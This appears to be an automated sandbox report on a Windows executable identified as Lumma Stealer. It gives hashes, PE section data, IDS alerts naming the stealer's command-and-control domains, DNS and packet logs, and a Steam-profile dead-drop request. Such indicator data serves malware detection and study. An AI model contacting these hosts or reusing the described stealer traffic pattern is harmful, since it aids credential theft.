                                                                                                                                                                                                      WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      WinFIG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      WinFIG-2024.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      SentinelOculus.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Download.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      Aquantia.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                      • 104.21.53.8
                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                      No context
                                                                                                                                                                                                      No created / dropped files found
                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):6.534484323708315
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                      File size:2'905'088 bytes
                                                                                                                                                                                                      MD5:7a359b81462a150726f40ae4d2ca23d5
                                                                                                                                                                                                      SHA1:07cc406c2b3ffdc91180d0b63b72326b6e14afd2
                                                                                                                                                                                                      SHA256:09c2ebee2e986aa2147ae54994262812f682a9534335b4843d486765e83f56ca
                                                                                                                                                                                                      SHA512:2f178a6b6b003d91f31cc0a7164914424ddb6b5896bdf1a121c0a44b7a44b9d7d83dc5233e2542c6777c454ae152842c74a2f35e596e755f8e7727e2707dcc32
                                                                                                                                                                                                      SSDEEP:49152:u2IdLLhRslkktZswUW8veMEhg8RUgK4tfA:u7ZLhRUk+ZstR4hg8Rw
                                                                                                                                                                                                      TLSH:E7D529D1B84475CBD4CE16F49527CE4A591E03B8CB2048D3EC6EE4BAAD73CC625B6D28
                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f............................../...........@...........................0......F-...@.................................W...k..
                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                      Entrypoint:0x6fd000
                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      jmp 00007FF7A0FA5DAAh
                                                                                                                                                                                                      rdmsr
                                                                                                                                                                                                      sub al, 00h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      jmp 00007FF7A0FA7DA5h
                                                                                                                                                                                                      add byte ptr [ebx], al
                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], dh
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      or byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add ecx, dword ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      and al, byte ptr [eax]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add ecx, dword ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      and al, byte ptr [eax]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      pop es
                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add ecx, dword ptr [edx]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                      0x10000x5d0000x25e0092ac4f98a4fec1103ed53d4eb0e826c4False0.9994520936468647data7.97591323533163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      qvddldgl0x600000x29c0000x29be002d42316faf21afadc538681d4c919889unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      dpjuhttd0x2fc0000x10000x4002b941091d5810f1896b75fc1c784ddaaFalse0.76171875data6.003436691910802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      .taggant0x2fd0000x30000x220099d030fa22de64e1130c0a4d9edf7af8False0.06364889705882353DOS executable (COM)0.8162823539358479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                      2024-10-20T20:14:56.284591+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.4647461.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.296573+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.4573921.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.356741+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.4535361.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.379461+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.4599341.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.391847+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.4637021.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.403458+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.4528001.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.417088+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.4492851.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:56.431526+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.4498081.1.1.153UDP
                                                                                                                                                                                                      2024-10-20T20:14:58.475439+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                                                                                                                                                      2024-10-20T20:14:59.486612+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.53.8443TCP
                                                                                                                                                                                                      2024-10-20T20:14:59.486612+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.53.8443TCP
                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.458782911 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.458838940 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.458913088 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.462052107 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.462074041 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.537305117 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.537427902 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.563060999 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.563091040 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.564243078 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.613473892 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.782322884 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:57.827400923 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475492954 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475522041 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475601912 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475611925 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475655079 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475691080 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475702047 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475716114 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.475742102 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.492386103 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.492414951 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.492475986 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.492482901 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.492794037 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.511614084 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.511674881 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.511841059 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.512831926 CEST49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.512849092 CEST44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.532066107 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.532110929 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.532202005 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.532547951 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.532560110 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.319286108 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.319360971 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.322788000 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.322798967 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.323232889 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.324529886 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.324554920 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.324616909 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.486650944 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.486769915 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.486871958 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.486898899 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.486963987 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.487032890 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.487039089 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.488737106 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.488800049 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.488843918 CEST49731443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.488857031 CEST44349731104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.545918941 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.545948982 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.546016932 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.546286106 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                                      Oct 20, 2024 20:14:59.546294928 CEST44349732104.21.53.8192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:15:00.269828081 CEST49732443192.168.2.4104.21.53.8
                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.284590960 CEST6474653192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.293905020 CEST53647461.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.296572924 CEST5739253192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.306140900 CEST53573921.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.356740952 CEST5353653192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.365976095 CEST53535361.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.379461050 CEST5993453192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.388943911 CEST53599341.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.391846895 CEST6370253192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.400749922 CEST53637021.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.403458118 CEST5280053192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.412220001 CEST53528001.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.417088032 CEST4928553192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.427577019 CEST53492851.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.431525946 CEST4980853192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.441675901 CEST53498081.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.445210934 CEST5712953192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.452394962 CEST53571291.1.1.1192.168.2.4
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.517244101 CEST5678653192.168.2.41.1.1.1
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.531141043 CEST53567861.1.1.1192.168.2.4
                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.284590960 CEST192.168.2.41.1.1.10xe6fbStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.296572924 CEST192.168.2.41.1.1.10xa42aStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.356740952 CEST192.168.2.41.1.1.10xb006Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.379461050 CEST192.168.2.41.1.1.10xdaefStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.391846895 CEST192.168.2.41.1.1.10x9b1Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.403458118 CEST192.168.2.41.1.1.10x8928Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.417088032 CEST192.168.2.41.1.1.10x8c89Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.431525946 CEST192.168.2.41.1.1.10xd69eStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.445210934 CEST192.168.2.41.1.1.10x4086Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.517244101 CEST192.168.2.41.1.1.10x27a2Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.293905020 CEST1.1.1.1192.168.2.40xe6fbName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.306140900 CEST1.1.1.1192.168.2.40xa42aName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.365976095 CEST1.1.1.1192.168.2.40xb006Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.388943911 CEST1.1.1.1192.168.2.40xdaefName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.400749922 CEST1.1.1.1192.168.2.40x9b1Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.412220001 CEST1.1.1.1192.168.2.40x8928Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.427577019 CEST1.1.1.1192.168.2.40x8c89Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.441675901 CEST1.1.1.1192.168.2.40xd69eName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:56.452394962 CEST1.1.1.1192.168.2.40x4086No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.531141043 CEST1.1.1.1192.168.2.40x27a2No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                      Oct 20, 2024 20:14:58.531141043 CEST1.1.1.1192.168.2.40x27a2No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                      • sergei-esenin.com
                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                      0192.168.2.449730104.102.49.2544436372C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                      2024-10-20 18:14:57 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                      2024-10-20 18:14:58 UTC1891INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
